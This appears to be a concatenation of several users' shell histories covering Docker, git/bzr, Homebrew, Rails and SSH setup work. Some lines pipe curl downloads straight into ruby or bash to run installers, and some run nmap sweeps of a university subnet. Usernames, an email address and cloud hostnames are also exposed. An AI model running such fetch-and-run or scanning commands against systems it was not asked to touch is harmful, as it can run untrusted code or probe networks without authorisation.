+ls -lrt +mkdir nginx +ls +sudo nano Dockerfile +ls -lrt +cat Dockerfile +ls -rlt +ps -ef|grep i apache +ps -ef|grep apache +sudo docker build +ls -lrt +sudo docker build -t +sudo docker build -t nginximage . +ls +cat Dockerfile +sudo nano Dockerfile +sudo docker build -t nginximage . +sudo apt-get install ngnix +sudo apt-get install +sudo docker build -t nginximage . +sudo apt-get install nginx +ls -lrt +sudo nano Dockerfile +sudo docker build -t nginximage . +sudo docker images +sudo docker run -p 8080:80 -d nginx +cat Dockerfile +sudo docker images +sudo docker rmi ubuntu +sudo docker images +sudo docker rmi nginx +sudo docker container ps +sudo docker stop 84426b648952 +sudo docker container ps +sudo docker rmi nginx +sudo docker images +sudo docker rmi nginximage +sudo docker images +sudo docker rmi nginx +sudo docker container ps +sudo docker compose stop 84426b648952 +sudo docker-compose stop 84426b648952 +sudo docker stop 84426b648952 +sudo docker images +sudo docker rmi nginx +sudo docker rmi/F nginx +sudo docker rmi/f nginx +sudo docker rmi\f nginx +sudo docker images + +sudo docker rmi/f nginx +sudo docker images +sudo docker ps +sudo docker stop 8adc0724bd88 && sudo docker rm 8adc0724bd88 +sudo docker ps +sudo docker stop e570c1f0bd99 && sudo docker rm e570c1f0bd99 +sudo docker ps +sudo docker stop 23d68c19f483 && sudo docker rm 23d68c19f483 +sudo docker ps +sudo docker ps -a +sudo docker stop 84426b648952 && sudo docker rm 84426b648952 +sudo docker stop c5e08e871d2d && sudo docker rm c5e08e871d2d +sudo docker stop 952e1e8090aa && sudo docker rm 952e1e8090aa +sudo docker images +sudo docker rmi nginx +sudo docker images +sudo docker build -t nginximage . +sudo docker images +sudo docker run -d -p 80:80 nginx +sudo docker ps -a + +sudo docker ps +ps -ef|grep -i nginx +$ sudo docker ps +ubuntu@ip-172-31-47-248:~/nginx$ sudo docker ps +sudo docker ps -a +history +ls -lrt +docker service create --name registry --publish published=5000,target=5000:2 +sudo docker service create --name registry --publish published=5000,target=5000:2 +exit +exit +sudo yum update +ls +pwd +ls +sudo su +ls +sudo su +sudo su +ls +rm -rf Herders/ +cp ~florent/Dev/Unity3D/Herders . +cp -rf ~florent/Dev/Unity3D/Herders . +rm -rf Herders/ +cp -rf ~florent/Dev/Unity3D/Herders . +ls +git status +git add Herders/Assets/FP_Scripts/AtomicBoolean.cs +git status +git add Herders/Assets/Plugins/x86/donotdelete.txt +git status +git commit -m +git commit -m 'my message' +git push +git commit -m 'my message' +git push +ls +ls +git status +git add ./ +push +git push +git commit -m 'herders in which ovr is replaced and all bugs fixed-un touched' +git push +l +ls +git status +git status +git add ./ +git commit -m 'build with no errors' +git push +git status +git add C:\Users\Mostafa\Documents\Herders Unity +git add 'C:\Users\Mostafa\Documents\Herders Unity' +kl +l +ls +git add 'C:\Users\Mostafa\Documents\Herders Unity' +ad ./ +ad .\ +ls +git status +.git +git add ./ +git add . +ls +git init +git add . +git commit -m 'Herders ported in Unity3d 5 with new Oculus API, xbox conteoller integrated' +git +git add remote HerdersUnity +git remote add origin HerdersUnity +git push origin master +git remote add origin Herders +git push origin master +git remote add originsUnity5 +git remote add originster/Herders +git push +git push origin master +git remote add originster/Herders +git remote add myoriginster/Herders +git push myorigin master +git remote add myorig2 +git push myorigin master +git push myorig2 master +git push myorig2 master +git push myorig2 mostafa +git pull myorig2 master +mkdir .ssh +chmod 700 .ssh +touch .ssh/authorized_keys +chmod 600 .ssh/authorized_keys +:wq +exit +ls +cat id_rsa.pub >> .ssh/authorized_keys +sudo vi /etc/ssh/sshd_config +exit +sudo /etc/init.d/sshd +sudo /etc/init.d/sshd restart +exit +git clone git@github.com:zdogma/sakura_dotfiles.git +ls +ls -a +cp .bash* ~/ +cp .git* ~/ +cp -R .git* ~/ +cp -R .vim* +cp -R .vim* ~/ +sudo cp -R .vim* ~/ +. .bashrc +. .vimrc +vim +vim .bashrc +. .bashrc +vim .bashrc +. .bashrc +;ls +vim . vimrc +vim .vimrc +git +vim .vimrc +. .vimrc +. .vimrc +vim .vimrc +vim . vimrc +mv Downloads/zdogma.pem ~/.ssh/ +mv .ssh/zdogma.pem ~/ +chmod 600 zdogma.pem +ls -a +mv Downloads/zdogma.pem ~/.ssh/ +mv .ssh/zdogma.pem ~/ +chmod 600 zdogma.pem +ls -a +mv Downloads/zdogma.pem ~/.ssh/ +mv .ssh/zdogma.pem ~/ +chmod 600 zdogma.pem +ls -a +ssh -i zdogma.pem ec2-user@ec2-54-201-249-53.us-west-2.compute.amazonaws.com +vim .bashrc +vim .bashrc +. .bashrc +ssha +ssha +vim .bashrc +ssha +vim .bashrc +ssha +exit +scp Downloads/イベレコ_logo.png -i zdogma.pem ec2-user@ec2-54-201-249-53.us-west-2.compute.amazonaws.com:~/ +vim ~/.bashrc +scp Downloads/イベレコ_logo.png -i zdogma.pem ec2-user@ec2-54-201-249-53.us-west-2.compute.amazonaws.com +scp Downloads/イベレコ_logo.png -i zdogma.pem ec2-user@ec2-54-201-249-53.us-west-2.compute.amazonaws.com:/ +ssha +ssha +ssha +ssha +ssha +ssha +ssha +ssha +ssha +./airport -s +pwd +tree +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +./airport -s +vim test.pl +ssha +mv Desktop/Sublime_Text_2.icns /Applications/Sublime\ Text\ 2.app/Contents/Resources/Sublime\ Text\ 2.icns +brew +brew info sshfs +brew info fuse4x-kext +brew install fuse4x-kext +sudo cp -rfX /usr/local/Cellar/fuse4x-kext/0.9.0/Library/Extensions/fuse4x.kext /Library/Extensions +sudo /bin/cp -rfX /usr/local/Cellar/fuse4x-kext/0.9.2/Library/Extensions/fuse4x.kext /Library/Extensions +sudo /bin/cp -rfX /usr/local/Cellar/fuse4x-kext/0.9.2/Library/Extensions/fuse4x.kext /Library/Extensions +sudo chmod +s /Library/Extensions/fuse4x.kext/Support/load_fuse4x +brew install sshfs +brew link autoconf +sudo /bin/cp -rfX /usr/local/Cellar/fuse4x-kext/0.9.2/Library/Extensions/fuse4x.kext /Library/Extensions +sudo chmod +s /Library/Extensions/fuse4x.kext/Support/load_fuse4x +mount -t fuse4x +brew install sshfs +mkdir mnt +sshfs -p 1030 sakura@ mnt +brew install sshfs +brew link autoconf +ls -a +ls -a /usr/local/share/emacs/site-lisp +ls -al /usr/local/share/emacs/site-lisp +ls -al /usr/local/share/emacs/ +chmod +w /usr/local/share/emacs/ +ls -al /usr/local/share/emacs/ +chmod a+w /usr/local/share/emacs/ +sudo chmod a+w /usr/local/share/emacs/ +ls -al /usr/local/share/emacs/ +brew link autoconf +sudo chmod 744 /usr/local/share/emacs/ +ls -al /usr/local/share/emacs/ +chmod 644 /usr/local/share/emacs/ +sudo chmod 644 /usr/local/share/emacs/ +ls -al /usr/local/share/emacs/ +ls -l /usr/local/share/emacs/ +kls +ls -a +ls -al +git +mkdir git_training +git init +ls -a +git rm -fr .git +git rmdir .git +rmdir .git +ls -a + git clone git@github.com:maroncoly/git_training.git +pwd +git clone +git clone git@github.com:maroncoly/git_training.git +vim yonmoku.java +vim ~/.vimrc +vim yonmoku.java +vim ~/.vimrc +. ~/.vimrc +vim yonmoku.java +git st +vim ~/.gitconfig +. ~/.gitconfig +git st +git status +git config --global color.ui auto +git statua +git status +git config --global color.diff auto +git config --global color.status auto +git config --global color.branch auto +git diff +git diff yonmoku.java +git diff master HEAD +git status +git st +vim gameStatus.pl +perl gameStatus.pl +git st +git add yonmoku.java +git st +git commit -m "yonmoku.javaを追加しますた" +git log +git hist +vim yonmoku.java +git st +git st +git add yonmoku.java +git st +git ci -m '出力に関するコメントを追加しました' +git log +vim yonmoku.java +git add yonmoku.java +git ci -m 'やっぱりコメントいらんかった' +git log +vim yonmoku.java +vim yonmoku.java +git st +git st +git push origin master +git push origin master +git pull +export $LANG +echo $LANG +git checkout -b training/reset +git br +git log +git reset HEAD +git log +git reset HEAD^ +git log +git st +vim yonmoku.java +git st +git st +vim yonmoku.java +git st +git ci -m 'コメントの内容を変更' +git st +git add yonmoku.java +git ci -m 'コメントの内容を変更' +git log +git push origin master +git pull +git push origin training/reset +git co master +git merge training/reset +vim yonmoku.java +git st +git add yonmoku.java +git ci -m 'マージのためのコンフリクト解消' +git st +git log +git hist +git co +git co bf0a067d026e9dca6c1c81048d1310e4fa5a9625 +git co master +git br +git br -d training/reset +git br +ls -al +vim .git +git fr .git +git +git add +git init +git st +git add -A +git ci -m 'initial commit' +git log +histor +historr +history +history | grep clone +git clone git@github.com:maroncoly/git_training.git +git log +ls -la +du ./ +man du +du -d 1 +du old/-d 1 +du old/ -d 1 +du old/ -d 1 +du -d 1 +du -d 1 +du -d 1 +du ./download_img/ -d 1 +du ./download_img/ -dh 1 +du -d 1./download_img/ +du -d 1 ./download_img/ +du -d 1 +top +brew +brew install the_silver_searcher +sudo brew install the_silver_searcher +brew link autoconf +sudo brew link autoconf +brew install ag +brew install automake +brew +brew update +brew install wget +wget +ruby -e "$(curl -fsSLkst.github.com/raw/323731/install_homebrew.rb)" +sudo port -f uninstall installed +vim man +sudo rm -rf /opt/local/ +brew +brew install ag +xcode-select --install +xcode-select --install +brew install ag +brew link autoconf +sudo brew link autoconf +sudo - +ls -al /usr/local/share/ +chmod 755 /usr/local/share/emacs/ +sudo chmod 755 /usr/local/share/emacs/ +sudo brew link autoconf +brew install ag +brew link autoconf +sudo chmod 755 /usr/local/share/emacs/site-lisp/ +brew install ag +brew install ag +brew link autoconf +brew link alink autoconf +brew doctor +xcode-select --install +sudo xcode-select --install +port install the_silver_searcher +brew install ag +brew link autoconf +brew install ag +brew link autoconf +sudo xcode-select --install +brew install the_silver_searcher +brew install the_silver_searcher +brew +brew doctor +echo export PATH='/usr/local/bin:$PATH' >> ~/.bash_profile +brew doctor +chown /usr/local/share/man/de +chown tomohiro /usr/local/share/man/de +sudo chown tomohiro /usr/local/share/man/de +brew prune /usr/local/share/ghostscript/Resource/CIDFont/LiHeiPro.ttf +brew link autoconf +brew link +brew link wget +brew link autoconf +brew link autoconf +brew doctor +echo export PATH='/usr/local/bin:$PATH' >> ~/.bash_profile +brew link autoconf +chown tomohiro /usr/local/share/man/de/man1 +sudo chown tomohiro /usr/local/share/man/de/man1 +brew doctor +echo export PATH='/usr/local/bin:$PATH' >> ~/.bash_profile +chmod -R u+w /usr/local +sudo chonw -R tomohiro /usr/local +sudo chown -R tomohiro /usr/local +brew link autoconf +brew install ag +ag Documents/ +ag Documents/ hoge +ag hoge Documents/ +man ag +ag tomohiro +ag Documents/ ミク +ag ミク Documents/ +ag 初音 Documents/ +ag 初音 Documents/ +ag ipa Documents/ +ag 旅行 Documents/ +ag 佐々木 Documents/ +ag 佐々木 Documents/ +ag ささき Documents/ +ag comm Documents/ +ag Git Documents/ +top +gem install rails +sudo gem install rails +ssh sakura +ssh sakura +ssh sakuea +ssh sakura +exit +ssh sakura +/Users/tomohiro/Downloads/activator-1.1.3/activator ; exit; +/Users/tomohiro/Downloads/activator-1.1.3/activator ; exit; +ssh sakuraw +ssh sakura +vim MessageController.scala +vim MainController.java +ps -ax | grep play +ag "Get JSON" +vim app/views/index.scala.html +ag Welcome +vim app/views/index.scala.html +vim app/views/index.scala.html +ssh sakura +ag Donut +ag Donuts +ad Birds +ag Birds +ag _Birds +ag sBirds +ag tBirds +ag ドーナツ +./airport -s +ssh sakura +ssh sakura +ssh sakura +ssh sakrua +ssh sakura +ssh sakura +ssh skaura +ssh sakura +ssh sakura +ssh sakura +ssh sakura +ssh sakura +ssh sakura +ssh sakura +scp Desktop/jquery-form-validate/stylesheets//jquery.validate.css tomsy@sakura:~/ +ssh sakura +scp Desktop/jquery-form-validate/javascripts/jquery.validate.js tomsy@sakura:~/ +ssh sakura +ssh sakura +ssh sakura +ssh sakura +brew install mobile-shell +mosh sakura +brew tap phinze/homebrew-cask +brew install brew-cask +brew install tig +brew install tmux +brew install zsh +brew install mobile-shell +vim ~/.bsjrc +vim ~/.bashrc +. ~/.bashrc +go get github.com/peco/peco/cmd/peco +vim ~/.bashrc +brew tap pecp/peco +brew tap peco/peco +brew update +brew tap homebrew/dupes +brew install pecp +brew install peco +history | peco +easy install pip +easy-install pip +brew install python +brew cask install vagrant +peco +go get github.com/motemen/ghq +go get -u github.com/typester/gh-open +vim ~/.bashrc +. ~/.bashrc +ghq get git@github.com:zdogma/MyStory.git +ghq get git@github.com:zdogma/MoeBBS.git +ghq get git@github.com:zdogma/MyApp.git +vim ~/.bashrc +. ~/.bashrc +hist +hoge +mosh sakura +tmux +ls +du -k | sort -n +ls +ls +rm Vampire\ the\ Requiem\ -\ Covenant\ -\ Circle\ of\ the\ Crone.pdf +ls +rm cheryltoFlat.xls +rm cheryltoFlat.xlsx +rm *.pdf +ls +rm mysql-connector-java-5.1.10* +rm -rf mysql-connector-java-5.1.10* +ls +du -k | sort -n +rm -rf MyDocuments/NetLogo\ 4.1.1/ +rm -rf MyDocuments/ZendGdata-1.10.2 +du -k | sort -n +rm -rf gitstuff/ +rm -rf weka* +ls -a +vi .bashrc +exit +ls +ls -a +vi .bashr +rm .bashr +vi .bashrc +ls +man nmap +:exit +exit +ls +.bash +man nmap +nmap -sP +ipconf +iptab +ip* +iperf +ls +ipcs +ifconfig +/sbin/ifconfig +nmap -sP 143.167.8.* +ls +ls -a +ls +nmap +nmap -n +nmap -sL +ipconfig +ifconfig +nmap -sL 143.167.8.* +nmap -sL 143.167.9.* +exit +ls +ls -a +vi .bashrc +ls +ls +ls +chsh /bin/sh +chsh /bin/shell +chsh /bin/bash +chsh /bash +chsh +man chsh +vi /etc/shells +chsh /bin/bash +chsh aca08tog /bin/bash +chsh -s /bin/bash aca08tog +chsh -s /bin/bash +chsh --list-shells +chsh /bin/sh +chsh -s /bin/sh +chsh -s /bin/sh aca08tog +ypchsh +man ypchsh +chsh +ls +chsh .bashrc +ls +chsh --version +chsh -s +chsh -s /bin/bash +ls /etc/passwd +ls /etc/passwd/ +vi /etc/passwd +chsh +ls +exit +source .bashrc +ls +exit +source .bashrc +vi .bash_profile.local +exit +ls +vim .bashrc +exit +ls +scp bashstuff +exit +ls +scp bashstuff +scp bashstuff -1 +ls +exit +x +x11 +l +email +mail +man mail +mailx +mailx -to +mailx -r aca08tog@sheffield.ac.uk +ls +send +sftp +exit +ruby +ruby --version +python --version +ls +exit +ls .ssh/ +s +rm * +ls +rm id_rsa +rm id_rsa.pub +ls +exit +ls +ls +cat id_rsa.pub >> authorized_keys +ls +exit +ls +ls +vi /etc/ssh/sshd_config +exit +ls +.ssh +ls +ls +vi authorized_keys +exit +ls +.ssh +ls +ls +chmod 700 ~/.ssh +chmod 600 ~/.ssh/authorized_keys +exit +chmod 700 .ssh/authorized_keys +exir +exit +xterm +x3270 +ls +x3270 +ls +exit +ls +v +exit +ssh stulogin.dcs.shef.ac.uk +sftp stulogin.dcs.shef.ac.uk +ls +resource +source .bashrc +ls +mv Downloads/vimrc ~/.vimrc +ls +vim +sudo apt-get vim +sudo apt-get install vim +vim +sudo apt-get install git +sudo apt-get install curl +vim +less .vimrc +wget --version +sudo apt-get install mercurial subversion bzr +vim +sudo apt-get install git-core +vim +exit +vim +curl --version +exit +ls +python --ver +python --version +python3 +ipython +vim +vam +vim +ls +./test.sh +chmod 777 test.sh +./test.sh +vim test.sh +./test.sh +vim test.sh +./test.sh +vi .vimrc +mv .vimrc vimtest +vim .vimrc +vim +mv vimtest .vimrc +ls +vim +bzr +ssh-keygen +rm .ssh/* +ls +ssh-keygen +ls +cat .ssh/id_rsa.pub +mkdir ~/.bazaar/plugins/gsdirs +ls +chmod 777 * +./epd-7.1-2-rh5-x86_64.sh +vim +ls +ls +vim .bash_profile +ipython +resource +ipython +ls +ls +exit +ls +vim knneighbour.py +ls +mkdir machinelearnign +mv machinelearnign/ machinelearning/ +ls +ls +wgetstaffwww.dcs.shef.ac.uk/people/T.Cohn/campus_only/wiki/uploads/Public/logreg.py +ls +vim logreg.py +unzip spambase.zip +ipython --pylab logreg.py +ipython-qtconsole logreg.py +ipython --pylab logreg.py +vim knneighbour.py +ipython --py +ipython --pylab +ipyton --pylab +ipython --pylab +mv Downloads/spambase.zip machinelearning/ +vim logreg.py +:q +ls +ls .bazaar/ +ls +bzr checkout bzr+ssh://bzr@bzr.genesys-solutions.co.uk/bzr-gsdirs/trunk ~/.bazaar/plugins/gsdirs +mkdir genesys +mkdir jobshop +bzr checkout gs:2011-ignite/jobshop/login +:q +ssh -v stulogin.dcs.shef.ac.uk +ls +ls +vim features/employer_login.feature +sudo apt-get install chromium-browser +sudo apt-get install acroread +exit +sudo apt-get update +java -v +sudo apt-get install openjdk-7-jdk +sudo apt-get install libavcodec-extra-53 +resource +bundle exec rake cucumber +rvm use +rvm use 1.9.2 +bundle exec rake cucumber +:q +./setup +rvm use +bash < <(curl -sseguin/rvm/master/binscripts/rvm-installer ) +rvm install 1.9.2 +resource +rvm install 1.9.2 +rvm use +./setup +gem install bundler +rvm use 1.9.2 +gem install bundler +resource +gem install bundler +ls +ruby -v +gem -v +gem +gem install bundler +ls +gem install +gem help install +ruby -v +gem -v +rvm package install zlib +rvm install zlib +sudo apt-get install zlib-bin +sudo aptitude install build-essential libssl-dev libreadline5 libreadline5-dev zlib1g zlib1g-dev +sudo apt-get install aptitude +sudo aptitude install build-essential libssl-dev libreadline5 libreadline5-dev zlib1g zlib1g-dev +ls +gem install bundler +resource +gem install bundler +rvm update +rvm use 1.9.2 +gem install bundler +gem install +sudo apt-get install zlib1g zlib1g-dev +rvm pkg install zlib +resource +rvm default 1.9.2 +gem install bundler +rvm remove 1.9.2 +rvm install 1.9.2 +gem install bundler +./setup +sudo apt-get install libxml2-dev libxml2 libxslt libxslt-dev +sudo apt-get install libxml2-dev libxml2 +sudo apt-get install libxslt1-dev +resource +./s +./setup +gem install sqlite3 +sudo apt-get install sqlite3 +./setup +gem install sqlite3 +resource +gem install sqlite3 +sudo apt-get install libsqlite3-dev +resource +./setup +ls +bundle exec rails s +ls +bundle exec rake cucumber +bundle exec rake cucumber --guess +bundle exec cucumber --gues +bundle exec cucumber --guess +ls +vim employer_login.feature +:q +ls +rvm use +rvm use 1.9.2 +ls +./setup +ls +bundle exec rake cucumber +ls +bundle exec rails generate devise employer +less features/step_definitions/employer_login_steps.rb +vim +bundle exec rake cucumber +./setup +bundle exec rake db:migrate +bundle exec rails generate scaffold employer name:string contact:string +rm db/migrate/* +bundle exec rails generate scaffold employer name:string contact:string +bzr rollback +bzr revert +ls +bundle exec rails generate scaffold employer name:string contact:string +ls +bundle exec rails generate devise employer +./setup +ls +bundle exec rake db:migrate +rm db/migrate/20111014144319_add_devise_to_employers.rb +bundle exec rake db:migrate +bzr revert +ls +bundle exec rake cucumber +bundle exec rake db:migrate +bundle exec rake cucumber +bundle exec rails generate devise employer +bundle exec rake db:migrate +exit +sudo apt-get install chromium-codecs-ffmpeg +sudo apt-get install chromium-codecs-ffmpeg-dbg +sudo apt-get install chromium-codecs-ffmpeg-extra +sudo apt-get install chromium-codecs-ffmpeg-extra-dbg +ls +vim features/employer_login.feature +exit +ls +bzr update +./setup +rvm use 1.9.2 +./setup +bzr checkout gs:2011-ignite/jobshop/posts +ls +./setup +bundle exec rails s +ls +bundle exec rake db:migrate +ls +vim db/migrate/20111014144736_add_devise_to_employers.rb +ls +ls +mv 20111014144736_add_devise_to_employers.rb ../ +ls +bundle exec rake db:migrate +ls +ls +bzr revision-history +ls +bzr help revert +bzr revert +ls +bzr commit +bzr whoami "Toby Gilham " +ls +./setup +ls +bzr commit +vi /home/aca08tog/.bash_aliases +be rails s +vi /home/aca08tog/.bash_aliases +resource +vi /home/aca08tog/.bash_aliases +resource +be rails s +resource +vi /home/aca08tog/.bash_aliases +resource +be +be rails s +bundle exec rails generate devise:install +vi config/application.rb +bundle exec rails generate devise employer +be rake db:migrate +screen be rails s +sudo apt-get install screen +be rake routes +resource +screen be rails s +screen bundle exec rails s +be rake cucumber +vim features/step_definitions/employer_login_steps.rb +be rake cucumber +vim features/step_definitions/employer_login_steps.rb +be rake cucumber +vim +vim features/support/paths.rb +vim config/routes.rb +vim features/support/paths.rb +vim +ctags +sudo apt-get install exuberant-ctags +vim +exit +be rake cucumber +rvm use 1.9.2 +vim .rvmrc +be rake cucumber +ls +vim employers.rb +ls +ls +ls +ls +vim employer_login.feature +be cucumber employer_login.feature +ls +vim ../spec/factories/employers.rb +be cucumber employer_login.feature +be rake routes +screen -r +be rails s +be rake routes +be cucumber employer_login.feature +be rails s -d +be cucumber employer_login.feature +ls +bzr commit t +bzr commit +bzr push +ls +cp employer_login.feature applicant_login.feature +cp step_definitions/employer_login_steps.rb applicant_login_steps.rb +ls +mv applicant_login_steps.rb step_definitions/ +be cucumber *.feature +ls +be rails generate scaffold applicant name:string contact:text +./setup +be rails generate devise applicant +be rake db:migrate +be cucumber features/applicant_login.feature +./setup +ls +less db/schema.rb +be cucumber features/applicant_login.feature +./setup +be cucumber features/applicant_login.feature +bzr commit -m "Applicant also done... also kind of changed login to sign in" +ls +be rake routes +be rails c +bzr commit -m "added sign in link to front page, currently only for applicant need to talk regards the employer path through system" +sqlite3 db/development.sqlite3 +ls +bzr ignore db/development.sqlite3 +bzr commit -m "adding the databases to the ignore file" +bzr remove-branch gs:2011-ignite/jobshop/Posts +sudo shutdown +exit +ls +bzr add .rvmrc +bzr commit -m "adding rvm rc to make it use ruby automatically" +exit +vpn-sheffield +ls +vim .bash_aliases +inst vpnc +vpnc +sudo vim /etc/vpnc/default.conf +sudo vpnc +ls +vim app/views/layouts/application.html.haml +bzr commit +vim features/applicant_login.feature +vim /home/aca08tog/.vimrc +vim +be rake spec +ls +rm -rf posts/ +ls +bzr checkout gs:2011-ignite/jobshop/keywords +be rake cucumber +rvm use 1.9.2 +be rake cucumber +./setup +be rake cucumber +rm -rf keywords/ +ls +exit +ls +bzr pull +bzr update +be rails s -d +./setup +ps -ef|grep script/rails +kill -9 2749 +kill -9 3017 +ls +ls +be rails generate migration RemoveContactFromEmployer contact:text +vim db/migrate/ +vim +search /tmp/*.rb +ls +ls +l +ls +l +ls +ls +ls +vim schema.rb +ls +vim +ls +rm employer_login_steps.rb +ls +vim features/step_definitions/employer_login_steps.rb +vim spec/factories/applicants.rb +bzr commit -m "everything i ruined earlier" +bzr status +bzr pull gs:2011-ignite/jobshop/trunk +bzr merge gs:2011-ignite/jobshop/trunk +ls +bzr push +ls +bzr push gs:2011-ignite/jobshop/trunk +exit +ls +be rake db:migrate +be rails generate migration RemoveContactFromApplicant contact:text +be rake db:migrate +be rails generate devise_views +be rails generate devise:views -e haml +rm -rf app/views/devise +be rails generate devise:views -t=haml +rm -rf app/views/devise +be rails generate devise_views -t=haml +bundle show +./setup +be rails g devise:views +for i in `find app/views/devise -name '*.erb'` ; do html2haml -e $i ${i%erb}haml ; rm $i ; done +be rake cucumber +bzr pull gs:2011-ignite/jobshop/trunk +bzr merge gs:2011-ignite/jobshop/trunk +bzr commit +bzr pull gs:2011-ignite/jobshop/trunk +bzr merge gs:2011-ignite/jobshop/trunk +bzr resolve +ls +mv spec/factories.moved/* spec/factories/ +rm spec/factories.moved/ +rm -rf spec/factories.moved/ +mv spec/helpers.moved/* spec/helpers/ +mv spec/models.moved/* spec/models/ +rm -rf spec/*.moved/ +bzr autoresolve +bzr resolve +mv db/migrate.moved/* db/migrate/ +rm -rf db/migrate.moved/ +bzr resolve +rm app/assets/stylesheets/*.moved +bzr autoresolve +bzr resolve +ls +bzr mv coverage/.resultset.json.BASE coverage/.resultset.json +bzr resolve coverage/* +bzr resolve +bzr resolve coverage/.resultset.json. +bzr resolve coverage/.resultset.json +bzr resolve spec/* +bzr resolve tmp/* +bzr resolve db/* +bzr resolve +bzr resolve log* +bzr resolve log/( +bzr resolve log/* +bzr resolve features/* +bzr resolve +bzr resolve app/assets/stylesheets/* +bzr resolve features/support/* +bzr resolve +bzr commit +bzr push gs:2011-ignite/jobshop/trunk +rm -rf login/ +bzr pull gs:2011-ignite/jobshop/trunk +bzr checkout gs:2011-ignite/jobshop/trunk +ls +./setup +be rails s +be rake db:migrate +be rake db:migrate --trace +ls +ls +ls +ls +ls +ls +bzr revert +ls +bzr revert +ls +bzr status +rm -rf trunk/ +ls +bzr checkout gs:2011-ignite/jobshop/login +ls +bzr stats +bzr status +ls +ls +bzr checkout gs:2011-ignite/jobshop/trunk +bzr uncommit +bzr uncommit -r -9 +bzr uncommit -r -7 +bzr uncommit -r -9 +bzr uncommit +ls +bzr uncommit -r -10 +bzr uncommit -r -12 +ls +ls +bzr status +rm -rf login/ +bzr checkout gs:2011-ignite/jobshop/login +ls +ls +vim Gemfile +./setup +vim .rvmrc +./setup +be rails g devise:install +ls +ls +vim development.rb +be rails g devise applicant name:string +be rails g devise employer name:string +./setup +./setup +ls +vim db/schema.rb +l +bzr status +vim features/employer_login.feature +be rake cucumber +cp features/employer_login.feature features/applicant_login.feature +cp features/step_definitions/employer_login_steps.rb features/step_definitions/applicant_login_steps.rb +be rake cuc +be rake cucumber +bzr add . +exit +bzr checkout gs:2011-ignite/jobshop/keywords +ls +vim Gemfile +./setup +rvm use 1.9.2 +./setup +be rails generate acts_as_taggable_on:migration +be rake db:migrate +be rake spec +bzr status +bzr add . +bzr commit +exit +ls +ls +vim db/schema.rb +./setup +rvm use 1.9.2 +./setup +ls +ls +ls login/ +vim .vimr +vim .vimrc +ls +ls +ls +vim Gemfile +./setup +be rails g devise:views -e haml +for i in `find app/views/devise -name '*.erb'` ; do html2haml -e $i ${i%erb}haml ; rm $i ; done +bzr status +bzr add . +vim app/views/devise/registrations/new.html.haml +bzr status +bzr add . +bzr commit -m "doing some form modification" +ls +bzr checkout gs:2011-ignite/jobshop/apply +ls +./setup +be rails s -d +vim app/views/posts/ +vim app/views/layouts/application.html.haml +PGREP RUBY +pgrep ruby +kill -9 3641 +ls +ls +man tar +.. +ls +bzr update +ls +rm -rf trunk/ +bzr checkout gs:2011-ignite/jobshop/trunk +ls +tar xvjf df_31_25_linux.tar.bz2 +ls +mv df_linux/ ~/ +.. +ls +ls +./df +ls +vim df +./df +vim df +./df +vim df +./df +ls +vim Dwarf_Fortress +./Dwarf_Fortress +vim df +./Dwarf_Fortress +./df +file /bin/ls +apt-get install libSDL +sudo apt-get install libSDL +sudo apt-get install ia32-libs +./df_linux/df +exit +sftp stulogin.dcs.shef.ac.uk +ssh stulogin.dcs.shef.ac.uk +ssh -v stulogin.dcs.shef.ac.uk +ssh stulogin.dcs.shef.ac.uk +ssh locomotive.dcs.shef.ac.uk +ls +sftp +sftp stulogin.dcs.shef.ac.uk +ssh stulogin.dcs.shef.ac.uk +exit +ssh locomotive.dcs.shef.ac.uk +exit +ls +ls +bzr update +vim app/views/layouts/application.html.haml +be rails s +./setup +vim db/migrate/ +rm db/migrate/20111019223917_acts_as_taggable_on_migration.rb +ls +./setup +be rails s +vim app/views/layouts/application.html.haml +ls +ls app/views/ +ls +ls +bzr status +ls +ls devise/ +cp devise/ ~/genesys/jobshop/trunk/app/views/ +ls +cp -r devise ~/genesys/jobshop/trunk/app/views/ +ls +ls +ls app/views/ +bzr status +bzr add app/views/devise/ +ls +bzr status +bzr resolve +bzr +bzr status +bzr commit +vim app/views/devise/registrations/new.html.haml +exit +bzr update +be rails s +bzr status +exit +vim app/views/jobapps/ +exit +ls +ls +ls +ls +bzr update +bzr resolve --all +be rails s +rvm use 1.9.2 +./setup +ls +bzr update +be rails s +exit +rake routes +exit +bzr update +./setup +be rails s +exit +ls +x3270 +sudo apt-get install x3270 +x3270 +exit +top +exit +ls +ls +bzr config +ls +vim README +ls +vim branch.conf +vim tags +:q +ls +vim bazaar.conf +sudo apt-get update && sudo apt-get upgrade +sudo apt-get install ubunutu-restricted-extras +sudo apt-get install ubuntu-restricted-extras +sudo apt-get install compizconfig-settings-manager +exit +unity +ccsm +exit +ls +vim .bash_aliases +ls -a +vim .bashrc +ls +zip .bash* bashshit.zip +ls +exit +ssh stulogin.dcs.shef.ac.uk +ls +exit +ls +ls +mkdir miracledb +ls +bzr checkout gs:2011-miracledb/trunk +ls +ls +... +./setup +inst libnotify +sudo apt-get install libnotify-dev +ls +ls +ls +bzr merge gs:rails-sample/trunk +bzr merge gs:rails-sample/trunk +bzr pull gs:rails-sample/trunk +ls +bzr break-lock +bzr pull gs:rails-sample/trunk +bzr break-lock +ls +bzr merge gs:rails-sample +bzr merge gs:rails-sample/trunk +bzr help pull +bzr checkout gs:rails-sample trunk +ls +ls +ls +ls +ls +bzr update +ls +bzr help push +ls +bzr help checkin +ls +ls +yes +ls +./setup +vim .rvmrc +./setup +ls +rm -rf .bzr +ls +bzr init +bzr push gs:2011-miracledb/trunk --create-prefix +bzr status +bzr add . +bzr push gs:2011-miracledb/trunk --create-prefix +bzr commit +bzr push gs:2011-miracledb/trunk --create-prefix +bzr push gs:2011-miracledb/trunk +bzr help diverged-branches +bzr missing +bzr merge gs:2011-miracledb/trunk +.. +rm -rf trunk/ +bzr checkout gs:2011-miracledb/trunk +ls +vim .rvmrc +ls +bzr status +ls +bzr status +vim Gemfile +vim ./s +vim setup +bundle install +rvm use +bundle install +rvm -v +rvm --version +ruby --version +rake spec +./setup +rake spec +vim Gemfile +bundle +guard init rspec +guard +vim Gemfile +bundle +guard init cucumber +bzr status +vim .rvmrc +bzr commit +bzr add . +bzr commit -m "actually adding stuff" +vim Guardfile +ls +bzr status +exit +ls +mkdir ~/py2to3/ +gunzip pexpect-pexpect.tar.gz /home/aca08tog/py2to3/ +ls +cp pexpect-pexpect.tar ~/py2to3/ +ls +ls +tar -xvf pexpect-pexpect.tar +ls +2to3 -w pexpect +ls +ls +vim tools/testall.py +exit +ls +ls +python3 